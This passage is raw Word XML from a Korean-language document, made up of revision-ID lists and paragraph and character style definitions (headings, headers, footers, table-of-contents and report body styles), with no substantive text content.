    <w:rsid w:val="009C3FDB"/>
    <w:rsid w:val="009C4FDA"/>
    <w:rsid w:val="009E1AEF"/>
    <w:rsid w:val="009E6DDB"/>
    <w:rsid w:val="009F704F"/>
    <w:rsid w:val="00A017DA"/>
    <w:rsid w:val="00A10ED8"/>
    <w:rsid w:val="00A36C99"/>
    <w:rsid w:val="00A5039B"/>
    <w:rsid w:val="00A54C32"/>
    <w:rsid w:val="00A628D7"/>
    <w:rsid w:val="00A62DF3"/>
    <w:rsid w:val="00A730F5"/>
    <w:rsid w:val="00A746AF"/>
    <w:rsid w:val="00A746EE"/>
    <w:rsid w:val="00A75096"/>
    <w:rsid w:val="00A77C7C"/>
    <w:rsid w:val="00A82FB4"/>
    <w:rsid w:val="00A87896"/>
    <w:rsid w:val="00A9506C"/>
    <w:rsid w:val="00AB4442"/>
    <w:rsid w:val="00AC6E44"/>
    <w:rsid w:val="00AE2646"/>
    <w:rsid w:val="00AE33C8"/>
    <w:rsid w:val="00AE587F"/>
    <w:rsid w:val="00AE7421"/>
    <w:rsid w:val="00AF452C"/>
    <w:rsid w:val="00B231E5"/>
    <w:rsid w:val="00B3315A"/>
    <w:rsid w:val="00B47319"/>
    <w:rsid w:val="00B5792D"/>
    <w:rsid w:val="00B736EA"/>
    <w:rsid w:val="00B8471A"/>
    <w:rsid w:val="00B96503"/>
    <w:rsid w:val="00BA1588"/>
    <w:rsid w:val="00BC3F03"/>
    <w:rsid w:val="00BD2684"/>
    <w:rsid w:val="00BE5DB8"/>
    <w:rsid w:val="00BF0260"/>
    <w:rsid w:val="00BF1B24"/>
    <w:rsid w:val="00BF3F9E"/>
    <w:rsid w:val="00C12853"/>
    <w:rsid w:val="00C21C0C"/>
    <w:rsid w:val="00C223A0"/>
    <w:rsid w:val="00C266BD"/>
    <w:rsid w:val="00C5298E"/>
    <w:rsid w:val="00C56F95"/>
    <w:rsid w:val="00C629B6"/>
    <w:rsid w:val="00C65AA7"/>
    <w:rsid w:val="00C767FF"/>
    <w:rsid w:val="00CD38E9"/>
    <w:rsid w:val="00CD773D"/>
    <w:rsid w:val="00CF2593"/>
    <w:rsid w:val="00D005BA"/>
    <w:rsid w:val="00D0229B"/>
    <w:rsid w:val="00D33FB2"/>
    <w:rsid w:val="00D52449"/>
    <w:rsid w:val="00D61B20"/>
    <w:rsid w:val="00D62089"/>
    <w:rsid w:val="00D65D1B"/>
    <w:rsid w:val="00D736A5"/>
    <w:rsid w:val="00D92DA3"/>
    <w:rsid w:val="00D94763"/>
    <w:rsid w:val="00D95D14"/>
    <w:rsid w:val="00DA3488"/>
    <w:rsid w:val="00DB3E07"/>
    <w:rsid w:val="00DD0C38"/>
    <w:rsid w:val="00DD4607"/>
    <w:rsid w:val="00DD5573"/>
    <w:rsid w:val="00E1045B"/>
    <w:rsid w:val="00E13437"/>
    <w:rsid w:val="00E344BD"/>
    <w:rsid w:val="00E34E71"/>
    <w:rsid w:val="00E357F9"/>
    <w:rsid w:val="00E53860"/>
    <w:rsid w:val="00E5427A"/>
    <w:rsid w:val="00E64015"/>
    <w:rsid w:val="00E706BC"/>
    <w:rsid w:val="00E76EFA"/>
    <w:rsid w:val="00E94242"/>
    <w:rsid w:val="00EA0434"/>
    <w:rsid w:val="00EA2F96"/>
    <w:rsid w:val="00EB727C"/>
    <w:rsid w:val="00ED0376"/>
    <w:rsid w:val="00ED0AAB"/>
    <w:rsid w:val="00EF4193"/>
    <w:rsid w:val="00F00805"/>
    <w:rsid w:val="00F03B64"/>
    <w:rsid w:val="00F0442D"/>
    <w:rsid w:val="00F2101B"/>
    <w:rsid w:val="00F339B9"/>
    <w:rsid w:val="00F370C3"/>
    <w:rsid w:val="00F51DEB"/>
    <w:rsid w:val="00F525DB"/>
    <w:rsid w:val="00F61503"/>
    <w:rsid w:val="00F635EE"/>
    <w:rsid w:val="00F717F6"/>
    <w:rsid w:val="00F72C1E"/>
    <w:rsid w:val="00F92BB2"/>
    <w:rsid w:val="00FA1908"/>
    <w:rsid w:val="00FA20AC"/>
    <w:rsid w:val="00FC3AA1"/>
    <w:rsid w:val="00FE58BB"/>
    <w:rsid w:val="00FE6E20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3EAB7"/>
  <w15:docId w15:val="{DBDCAFEA-E50D-464D-8B7B-AC47ECCC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6"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009A63AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:ind w:left="403" w:rightChars="100" w:right="100" w:hanging="403"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b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D30D0"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:leftChars="300" w:left="300" w:hangingChars="200" w:hanging="2000"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Level4TitleCtl4"/>
    <w:next w:val="a"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/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AD774D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="12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제목 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b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9A63AD"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="제목 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0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rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:aliases w:val="h"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="머리글 Char"/>
    <w:aliases w:val="h Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="바닥글 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="바탕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5D30D0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="날짜 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7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8">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char3"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F13AA6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:ind w:leftChars="400" w:left="1200" w:hangingChars="200" w:hanging="400"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level2TitleCtl2">
    <w:name w:val="본문 Level 2 Title [Ctl+2]"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="001F7928"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level1TitleCtl1">
    <w:name w:val="본문 Level 1 Title [Ctl+1]"/>
    <w:basedOn w:val="10"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:hangingChars="177" w:hanging="177"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3TitleCtl3">
    <w:name w:val="본문 Level 3 Title [Ctl+3]"/>
    <w:basedOn w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A47D52"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:wordWrap/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="0" w:left="538" w:firstLineChars="0" w:hanging="425"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level2Alt2">
    <w:name w:val="본문 Level 2 내용 [Alt+2]"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:ind w:leftChars="354" w:left="708"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:leftChars="354" w:left="708" w:rightChars="70" w:right="140" w:firstLine="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ab">
    <w:name w:val="본문 보고서(상세결과)"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="0029697E"/>
    <w:pPr>
      <w:ind w:leftChars="280" w:left="56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5D30D0"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3Alt3">
    <w:name w:val="본문 Level 3 내용 [Alt+3]"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:ind w:leftChars="496" w:left="992"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="미주 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad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C30AA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:before="240" w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="213" w:left="426" w:rightChars="212" w:right="424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E425E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
        <w:tab w:val="left" w:pos="1276"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="354" w:left="708" w:rightChars="212" w:right="424" w:firstLine="1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5D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1560"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:ind w:leftChars="567" w:left="1134"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3">
    <w:name w:val="본문 Level 3 목록"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:wordWrap/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:left="993" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char5">
    <w:name w:val="각주 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af0">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af1">
    <w:name w:val="첫페이지 날짜"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Title">
    <w:name w:val="Title 목차"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="52"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitleCtSht">
    <w:name w:val="Title 표 (표 머리글) [Ct+Sh+t]"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level1Alt1">
    <w:name w:val="본문 Level 1 내용 [Alt+1]"/>
    <w:basedOn w:val="Level2Alt2"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:leftChars="213" w:left="426"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level4TitleCtl4">
    <w:name w:val="본문 Level 4 Title [Ctl+4]"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="001278AF"/>
    <w:pPr>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="71" w:left="566" w:hangingChars="212" w:hanging="424"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level4Alt4">
    <w:name w:val="본문 Level 4 내용 [Alt+4]"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="009B0F0F"/>
    <w:pPr>
      <w:wordWrap/>
      <w:ind w:left="1276" w:rightChars="141" w:right="282"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:noProof/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char6">
    <w:name w:val="메모 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af3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5D30D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char7">
    <w:name w:val="메모 주제 Char"/>
    <w:basedOn w:val="Char6"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char8">
    <w:name w:val="풍선 도움말 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0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el4URL">
    <w:name w:val="본문 Level 4 URL"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Level4URLChar"/>
    <w:qFormat/>
    <w:rsid w:val="003B4450"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
      <w:wordWrap/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:ind w:left="1276" w:rightChars="70" w:right="140"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Level4URLChar">
    <w:name w:val="본문 Level 4 URL Char"/>
    <w:link w:val="Level4URL"/>
    <w:rsid w:val="003B4450"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D352BC"/>
    <w:pPr>
      <w:widowControl/>
      <w:wordWrap/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="40">
    <w:name w:val="toc 4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-">
    <w:name w:val="스타일 본문-동그라미 + (기호) 굴림체"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00F562BF"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:kinsoku w:val="0"/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:spacing w:before="120" w:line="360" w:lineRule="exact"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="jun2">
    <w:name w:val="jun_2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="jun2Char"/>
    <w:qFormat/>
    <w:rsid w:val="001C31CE"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="108"/>
      <w:ind w:right="198"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="jun3">
    <w:name w:val="jun_3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="jun3Char"/>
    <w:qFormat/>
    <w:rsid w:val="001C31CE"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="300" w:lineRule="atLeast"/>
      <w:ind w:leftChars="300" w:left="600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="jun2Char">
    <w:name w:val="jun_2 Char"/>
    <w:link w:val="jun2"/>
    <w:rsid w:val="001C31CE"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="jun3Char">
    <w:name w:val="jun_3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="jun3"/>
    <w:rsid w:val="001C31CE"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="본문 (수준1)"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="000448F9"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="150" w:left="300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="본문 (수준4)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="4Char0"/>
    <w:rsid w:val="00B14512"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="650" w:left="1300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char0">
    <w:name w:val="본문 (수준4) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="41"/>
    <w:rsid w:val="00B14512"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="표_헤더(대)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char9"/>
    <w:rsid w:val="00B14512"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char9">
